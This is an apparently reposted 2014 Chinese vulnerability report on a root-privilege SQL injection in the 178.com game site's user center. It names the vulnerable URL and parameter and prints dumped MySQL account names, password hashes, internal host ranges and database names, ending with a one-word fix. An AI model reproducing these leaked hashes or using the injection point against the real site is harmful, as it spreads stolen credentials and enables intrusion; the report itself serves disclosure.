178游戏网存在root权限SQL注射可夸跨库下载

来源:黑吧安全网 浏览:1576次 时间:2014-07-31
做网站找雨过天晴工作室

178游戏网存在root权限SQL注入,可夸库

问题存在于个人中心

http://i.178.com/~index.index?uid=1

DB User & Pass: root:712bc5ee3d42fdc1:localhost

root:712bc5ee3d42fdc1:127.0.0.1

:712bc5ee3d42fdc1:localhost

repl_user:4b1923db029b410c:192.168.20.%

citeuserooo:70fbbe1837c3940e:192.168.20.%

ranktest:10e55efc386fbf89:192.168.20.%

sns_user:35cf510b3e94820e:192.168.20.%

backup:4b1923db029b410c:192.168.20.65

jsvc_user:542055bd26f15a5c:192.168.20.%

cacti:142bb1aa1e6a5804:192.168.20.%

rank_user:432ea4c87b20fbd2:192.168.20.%

sns_repl:389e6960325eb291:192.168.20.%

py_usr:2217c76d1d6a91d6:192.168.20.1

temp_user:5155339f7d8b2d51:192.168.20.%

Data Bases: information_schema

game

innodb

mysql

sns2

sns_admin

sns_album

sns_api

sns_bet

sns_blog

sns_cite

sns_get_armory

sns_group

sns_gsrank

temp_sns_cite

test





似以前有人提交过这个漏洞 不知道怎么还是存在

修复方案:

过滤吧